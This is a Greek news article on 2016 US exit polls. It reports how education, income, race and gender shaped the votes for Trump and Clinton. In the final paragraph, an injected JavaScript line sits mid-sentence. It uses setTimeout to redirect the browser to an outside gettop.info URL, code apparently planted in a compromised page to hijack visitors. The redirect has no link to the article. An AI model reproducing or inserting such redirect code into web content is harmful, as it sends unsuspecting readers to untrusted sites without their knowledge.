Ποιοι ψήφισαν τον Τραμπ – Δραστικό ρόλο έπαιξε το μορφωτικό επίπεδο

0
7

 

Σύμφωνα με τα exit poll διαφοροποιήθηκε ο τρόπος με τον οποίο ψηφίζουν δημογραφικές ομάδες, οι οποίες και φαίνεται να είναι εκείνες που καθόρισαν το αποτέλεσμα υπέρ του Ντόναλντ Τραμπ.

Αναλυτικά, ο Ρεπουμπλικανός υποψήφιος κέρδισε τις ψήφους των λευκών Αμερικανών χωρίς πτυχίο καθώς είχε πολύ μεγαλύτερη απήχηση από τους προηγούμενους υποψηφίους του κόμματος μεταξύ των λευκών Αμερικανών που δεν διαθέτουν πτυχίο πανεπιστημίου.

Η υποστήριξη των κομμάτων άλλαξε σημαντικά σε όλα τα επίπεδα εισοδήματος

Ιστορικά οι πιο χαμηλόμισθοι ψηφοφόροι τείνουν να υποστηρίζουν τους Δημοκρατικούς και οι πιο πλούσιοι του Ρεπουμπλικάνους.

Όμως το ύψος του εισοδήματος αντιστοιχεί και με το επίπεδο μόρφωσης, το οποίο έπαιξε αποφασιστικό ρόλο σε αυτές τις εκλογές.

Οι μειονότητες προτίμησαν την Κλίντον, ενώ οι λευκοί άνδρες τον Τραμπ

Οι Αφροαμερικανοί, οι Ισπανόφωνοι και οι Αμερικανοασιάτες υποστήριξαν στο μεγαλύτερο ποσοστό τους την υποψήφια των Δημοκρατικών Χίλαρι Κλίντον. Παρ’ όλα αυτά το επίπεδο υποστήριξής τους προς αυτήν ήταν μικρότερο από αυτό που είχαν δείξει στον απερχόμενο πρόεδρο Μπαράκ Ομπάμα πριν από 4 χρόνια, σύμφωνα με το ΑΠΕ-ΜΠΕ.

Παράλληλα, η υποστήριξη του Τραμπ μεταξύ των λευκών ανδρών τείνει να είναι λίγο μεγαλύτερη ή τουλάχιστον ίση με αυτή που έχαιραν οι προηγούμενοι υποψήφιοι των Ρεπουμπλικάνων.

Ο Τραμπ κέρδισε με μεγάλη διαφορά την ψήφο των ανδρών

Ο Τραμπ αύξησε την υποστήριξη των Ρεπουμπλικανων μεταξύ των ανδρών, ενώ δεν έχασε στις γυναίκες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here